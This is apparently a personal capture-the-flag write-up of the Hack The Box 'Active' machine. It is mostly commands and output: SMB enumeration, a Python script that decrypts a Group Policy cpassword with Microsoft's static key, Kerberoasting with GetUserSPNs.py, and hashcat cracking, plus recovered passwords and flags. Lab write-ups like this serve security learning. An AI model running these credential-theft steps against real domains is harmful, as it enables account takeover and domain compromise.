Active

This is a windows machine from hack the box.

nmap -sV -sC -oA sauna 10.10.10.175

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 22:55 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 22.22% done; ETC: 22:56 (0:00:21 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-28 02:55:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-28T02:56:46
|_  start_date: 2023-08-28T02:44:46
|_clock-skew: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.36 seconds

NMAP Scan explained

nmap -sV -sC -oA sauna 10.10.10.175

As per the NMAP website

To reflect those different uses and to simplify the choice of which scripts to run, each script contains a field associating it with one or more categories. Currently defined categories are `auth`, `broadcast`, `default`. `discovery`, `dos`, `exploit`, `external`, `fuzzer`, `intrusive`, `malware`, `safe`, `version`, and `vuln`. These are all described in [the section called “Script Categories”](https://nmap.org/book/nse-usage.html#nse-categories "Script Categories").

Searching for scripts


So in the command   - nmap -sV -sC -oA sauna 10.10.10.175

`-sC`: This runs a script scan using the default set of scripts. It's equivalent to `--script=default` and is useful for running a series of basic tests that are generally safe and quick to perform. These scripts include various checks for common vulnerabilities, enumeration tasks, and more. The scripts are part of Nmap's Scripting Engine (NSE).

- `-sV`: This tells Nmap to perform service version detection. Nmap tries to determine the service and version information for each open port it finds. For example, it would not only identify that port 80 is open but also try to determine if it is running Apache or Nginx and which version.

therefor the scripts that are actually run with the two above switches are;

```bash

┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse

if you want to check what also is included with the “safe” catagory;


└─$ locate -r '\.nse

so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100


nmap --script safe -p 445 10.10.10.100                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 06:03 EDT
Pre-scan script results:
| broadcast-dns-service-discovery: 
|   224.0.0.251
|     443/tcp hue
|       Address=192.168.1.121 fe80::eeb5:faff:fe3f:43f3
|     8009/tcp googlecast
|       id=4d2af0de7f5852642fd2d0b454e63b9a
|       cd=CFC87D16FF43ADAFB6C7E851317CD8C2
|       rm=3DFFE977CB4B85C7
|       Address=192.168.1.6
|     10001/tcp googlezone
|       Address=192.168.1.6
|     45670/tcp airplay
|       acl=0
|       deviceid=5C:C1:D7:2B:2C:B2
|       features=0x7F8AD0,0x38BCB46
|       rsf=0x3
|       fv=p20.T-NKLUABC-2410.0
|       flags=0x204
|       model=UTU8000
|       manufacturer=Samsung
|       serialNumber=0A363NFN601123T
|       protovers=1.1
|       srcvers=377.25.06
|       pi=22:4C:DA:D7:69:8A
|       psi=00000000-0000-0000-0000-224CDAD7698A
|       gid=00000000-0000-0000-0000-224CDAD7698A
|       Address=192.168.1.92
|     49155/tcp rdlink
|       Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
|     49155/tcp rdlink
|       Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
|     49478/tcp companion-link
|       rpMac=0
|       rpHN=ac2159579038
|       Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
|     51676/tcp companion-link
|_      Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: Linux UPnP/1.0 Huawei-ATP-IGD
|_      Location: http://192.168.1.1:37215/upnpdev.xml
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.30s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2:0:2
|_    2:1:0
| smb2-time: 
|   date: 2023-08-28T10:04:15
|_  start_date: 2023-08-28T02:44:46
| smb2-capabilities: 
|   2:0:2: 
|     Distributed File System
|   2:1:0: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| dns-blacklist: 
|   SPAM
|_    l2.apews.org - FAIL
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| port-states: 
|   tcp: 
|_    open: 445
|_fcrdns: FAIL (No PTR record)
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 2s

Post-scan script results:
| reverse-index: 
|_  445/tcp: 10.10.10.100
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds

Nothing much got from the above

Use SMBclient to list shares with nulll password


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient -L //10.10.10.100                                           
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed


└─$ smbmap -r Replication -H 10.10.10.100        

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[!] Bummer:  cannot access local variable 'priv_status' where it is not associated with a value

Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’

The above command did not work

Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (2.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.9 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> 

From ChatGPT

  • Groups.xml: The Groups.xml file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords.
  • Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.

Searching for this file after it downloaded with the mget


┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate Groups.xml                                                                                                              
/home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
                                                                                                                                               
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cd /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
                                                                                                                                               
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ more Groups.xml                                                                          
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
 changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassw
ord="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acct
Disabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
                                                                                                                                               
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]

Found a python utility online. The python codo is as below. You need tyo install pycryptodome

┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ pip install pycryptodome
Defaulting to user installation because normal site-packages is not writeable
Collecting pycryptodome
  Obtaining dependency information for pycryptodome from https://files.pythonhosted.org/packages/40/88/89623388754162ddb82c62814ccbfdbfcc8ed9bd6d5f7412d2479bdca3a7/pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata
  Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 6.0 MB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.18.0

The python code

#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii

def decrypt_cpassword(cpassword):
    # Static key used by Microsoft
    key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
    
    # Decode the base64 encoded cpassword
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    cpassword_decoded = b64decode(cpassword)
    
    # Decrypt using AES with the static key
    cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)
    
    return decrypted.decode('utf16')

# Test with a sample cpassword
cpassword = "YourEncryptedPasswordHere"
print(decrypt_cpassword(cpassword))

Replace the cpassword in the python


#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii

def decrypt_cpassword(cpassword):
    # Static key used by Microsoft
    key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
    
    # Decode the base64 encoded cpassword
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    cpassword_decoded = b64decode(cpassword)
    
    # Decrypt using AES with the static key
    cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)
    
    return decrypted.decode('utf16')

# Test with a sample cpassword
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
print(decrypt_cpassword(cpassword))

Run the python script


┌──(kali㉿kali)-[~/HTB/Active]
└─$ ./decode.py  
GPPstillStandingStrong2k18
                            

Connect to the shartes using smbclient with the username and the password


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 278327 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sun Aug 27 22:45:51 2023

                5217023 blocks of size 4096. 278327 blocks available
smb: \SVC_TGS\Desktop\> cat users.txt 
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt 
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active.gnmap  active.htb  active.nmap  active.xml  decode.py  kerbrute  users.txt  user.txt
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat user.txt
7230de90eec1be42f0ae91ed9e955dca
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]

use the impacket GetUserSPNs.py


└─$ ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-08-27 22:45:57.011359             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$2baa10b89e539debb3826e895558bb411716440163c0c58732cf720323c9a9aa826a642157ad0d2ba376c95c56afefc1d4bee7a9533630a6dcc04fd9ba8af95c4d25ebe2077c0326a388e77ec446b5cee6791dc59391bb593c123a7d8ad7900666ff52a8abb54bb669975036dbb81b3332dd97030abf678aa05615d2d8a5451438bd5e7a42dbf216af9a9f76e13555b7fe50499506ba21810da519597d02d93f97c3c0a9e46232cd6a42773164e0379856e7a6a79b99e03dc04d8068773671debcf475d1f2e697b7f712a05c80eec8db9c08415334891be5de3fc956d3eec167f2e40b0dd3c1455b963edbd257da9c3294bcdbe5c8e2a5f66fc502c4f4f6eff26789fb44ac74be1a19964e631db761c77ec358125ca2c361956fa2507babb386f287c8f40c6ffad883191f9a5927565251a3fe6b2b284865474622ca1af1165ed868941f0a2a10d2d3be6d00594a7b0de296b56cefa7498e8650b51ef5808ff403901ecf3cf05a32469e0f60f77d2e8a0624a66f3a44739fb156fc56e3067c55cc46656fea04484022190de22832dbb7c0e3df5921be6c401c21a56e39cc96b9a57ff699e69aa96ce0d3031f75b596b349f11b46bbe2270fc3434a294bd4c085ff2713704d1131152603055e683de455f2e15a52ddacede834c80cf172409f68658a8f5db4e46a349b135718218e5cf36aecf830d0515fa580740bd9dbb1fa7488cdc7c57c1f1e0cabc208d581703b812ad69d1e58d4850b1f5015679b63fdfee9dc66720fe83c2662dcf719bd7205aadbebc891b631a13d03561982092636d6cbc56c2ffbcf4bebed14ceeb74898d828dacb93b6fcf07db4d0d972a39f3891ccb09a95a530fbd50f583f0eba35a349a884e65c3d112886e9712f8b9b1af0b359ae30ae2b952e1449d990ea5c34af41dc73ca4b4b9986daa98c1c87ff987fc61a0fa25e16a4799a54c0c5995daf2fba027844d18eb9d6d4cf0986b66e5ee4a536b1385341e63e582c7f7320104a164ee4c63d7c96c22aba031f6c6f90631f2e4a7aaa9e56d52f51352f608c1d538a2f76fddcfd27229b9467d4a36c3c6a252b05f1a7fc691d5722223b8d8d6d44886ed4e93afcd8f98b81ad2d6464c15d0e58315f14c2e46a8335b41dd7fbb5294d57a64881da8c5c667f815f876717498a16e8a2092525a56239e7ae2c60414fedc572d4fe793eadbc06ec516bc60c775c5b65e6e0764b84160d20b55268d3a1e0c59027e96c883c0ecb3aebe
                                                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less 
Hash mode #13100
  Name................: Kerberos 5, etype 23, TGS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Using hashcat and rockyou

┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 13100 /home/kali/HTB/Active/active /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$2baa10b89e539debb3826e895558bb411716440163c0c58732cf720323c9a9aa826a642157ad0d2ba376c95c56afefc1d4bee7a9533630a6dcc04fd9ba8af95c4d25ebe2077c0326a388e77ec446b5cee6791dc59391bb593c123a7d8ad7900666ff52a8abb54bb669975036dbb81b3332dd97030abf678aa05615d2d8a5451438bd5e7a42dbf216af9a9f76e13555b7fe50499506ba21810da519597d02d93f97c3c0a9e46232cd6a42773164e0379856e7a6a79b99e03dc04d8068773671debcf475d1f2e697b7f712a05c80eec8db9c08415334891be5de3fc956d3eec167f2e40b0dd3c1455b963edbd257da9c3294bcdbe5c8e2a5f66fc502c4f4f6eff26789fb44ac74be1a19964e631db761c77ec358125ca2c361956fa2507babb386f287c8f40c6ffad883191f9a5927565251a3fe6b2b284865474622ca1af1165ed868941f0a2a10d2d3be6d00594a7b0de296b56cefa7498e8650b51ef5808ff403901ecf3cf05a32469e0f60f77d2e8a0624a66f3a44739fb156fc56e3067c55cc46656fea04484022190de22832dbb7c0e3df5921be6c401c21a56e39cc96b9a57ff699e69aa96ce0d3031f75b596b349f11b46bbe2270fc3434a294bd4c085ff2713704d1131152603055e683de455f2e15a52ddacede834c80cf172409f68658a8f5db4e46a349b135718218e5cf36aecf830d0515fa580740bd9dbb1fa7488cdc7c57c1f1e0cabc208d581703b812ad69d1e58d4850b1f5015679b63fdfee9dc66720fe83c2662dcf719bd7205aadbebc891b631a13d03561982092636d6cbc56c2ffbcf4bebed14ceeb74898d828dacb93b6fcf07db4d0d972a39f3891ccb09a95a530fbd50f583f0eba35a349a884e65c3d112886e9712f8b9b1af0b359ae30ae2b952e1449d990ea5c34af41dc73ca4b4b9986daa98c1c87ff987fc61a0fa25e16a4799a54c0c5995daf2fba027844d18eb9d6d4cf0986b66e5ee4a536b1385341e63e582c7f7320104a164ee4c63d7c96c22aba031f6c6f90631f2e4a7aaa9e56d52f51352f608c1d538a2f76fddcfd27229b9467d4a36c3c6a252b05f1a7fc691d5722223b8d8d6d44886ed4e93afcd8f98b81ad2d6464c15d0e58315f14c2e46a8335b41dd7fbb5294d57a64881da8c5c667f815f876717498a16e8a2092525a56239e7ae2c60414fedc572d4fe793eadbc06ec516bc60c775c5b65e6e0764b84160d20b55268d3a1e0c59027e96c883c0ecb3aebe:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b3aebe
Time.Started.....: Mon Aug 28 08:18:20 2023 (23 secs)
Time.Estimated...: Mon Aug 28 08:18:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   456.6 kH/s (2.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 73%

Started: Mon Aug 28 08:17:46 2023
Stopped: Mon Aug 28 08:18:45 2023

Passwword is Ticketmaster1968

Connect with smbclient


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968           
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 278043 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Mon Jul 16 06:14:21 2018
  ..                                  D        0  Mon Jul 16 06:14:21 2018
  AppData                           DHn        0  Mon Jul 16 06:14:15 2018
  Application Data                DHSrn        0  Mon Jul 16 06:14:15 2018
  Contacts                           DR        0  Mon Jul 30 09:50:10 2018
  Cookies                         DHSrn        0  Mon Jul 16 06:14:15 2018
  Desktop                            DR        0  Thu Jan 21 11:49:47 2021
  Documents                          DR        0  Mon Jul 30 09:50:10 2018
  Downloads                          DR        0  Thu Jan 21 11:52:32 2021
  Favorites                          DR        0  Mon Jul 30 09:50:10 2018
  Links                              DR        0  Mon Jul 30 09:50:10 2018
  Local Settings                  DHSrn        0  Mon Jul 16 06:14:15 2018
  Music                              DR        0  Mon Jul 30 09:50:10 2018
  My Documents                    DHSrn        0  Mon Jul 16 06:14:15 2018
  NetHood                         DHSrn        0  Mon Jul 16 06:14:15 2018
  NTUSER.DAT                       AHSn   524288  Sun Aug 27 22:45:57 2023
  ntuser.dat.LOG1                   AHS   262144  Sun Aug 27 23:33:08 2023
  ntuser.dat.LOG2                   AHS        0  Mon Jul 16 06:14:09 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  ntuser.ini                         HS       20  Mon Jul 16 06:14:15 2018
  Pictures                           DR        0  Mon Jul 30 09:50:10 2018
  PrintHood                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Recent                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Saved Games                        DR        0  Mon Jul 30 09:50:10 2018
  Searches                           DR        0  Mon Jul 30 09:50:10 2018
  SendTo                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Start Menu                      DHSrn        0  Mon Jul 16 06:14:15 2018
  Templates                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Videos                             DR        0  Mon Jul 30 09:50:10 2018

                5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Sun Aug 27 22:45:51 2023

                5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\Desktop\> get root.txt 
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active  active.gnmap  active.htb  active.nmap  active.xml  decode.py  kerbrute  root.txt  users.txt  user.txt
                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat root.txt 
b74a82c6fd9308eadeb3be8c43a6e766
